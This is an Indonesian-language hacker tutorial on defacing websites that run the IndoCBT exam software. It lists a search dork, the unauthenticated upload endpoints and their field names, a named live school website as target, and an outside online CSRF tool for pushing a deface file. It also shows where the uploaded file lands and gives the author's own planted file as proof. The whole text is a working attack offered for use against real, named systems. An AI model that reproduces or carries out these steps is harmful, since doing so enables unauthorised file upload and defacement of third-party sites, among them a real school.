Tutorial Deface Metode IndoCBT

 

Ok ngab, kembali lagi dengan gw Arman1337 , Kali ini akan memberikan sebuah tutorial deface metode IndoCBT beserta live target nya yh ngab:v

Pertama2 kita siap kan bahan2 nya dulu

Bahan : 

-dork ; IndoCBT login.php

-exploit ;

admin/action/slide1 = uploadfile5

admin/action/slide2 = uploadfile6

admin/action/slide3 = uploadfile7

admin/action/slide4 = uploadfile8

admin/action/slide5 = uploadfile9

-Sc depes kalian

-Live target http://www.sman5us.online/login.php

- Csrf Online banyak di google

- Kuota Internet Paling penting:v

Okeh langsung saja kita ketutorial nya

Pertama-tama kalian ngedorking dulu di google:v

Nah kalian ngedork cari web nya, tanda2 Vuln=> Blank , Jika redirect ke halaman admin login php , kalian skip aja yh

Karena gw udh ada live target jadi kita gunain aja yh:"

Live Target? 

http://www.sman5us.online/login.php

Kalian buka dan masukkan Exploit nya, di sini gw make Exploit yang admin/action/slide5.php jika blank maka itu artinya Vuln 

Sekarang kita tinggal buka Csrf Online nya, untuk Csrf nya bisa make 

http://tools.rajawalisecteam.tech/csrf.php

Kalian buka Csrf nya , bagian url isi dengan target di atas, postfile nya sesuaikan dengan Exploit nya yh ngab, karena gw di sini make yg slide5 jadi postfile nya uploadfile9

Jika udh kalian klik lock target

Pilih file kalian dan tekan upload

Jika berhasil upload maka akan ada tulisan sucsess seperti berikut;

Cara akses nya? site.com/admin/images/namafile Lo

my results?

http://www.sman5us.online/admin/images/ft.php

Okeh itu aja dari gw kurang lebih nya minta maaf, saya akhiri assalamualaikum warahmatullahi wa barakatuh

#Thanks To All my Friends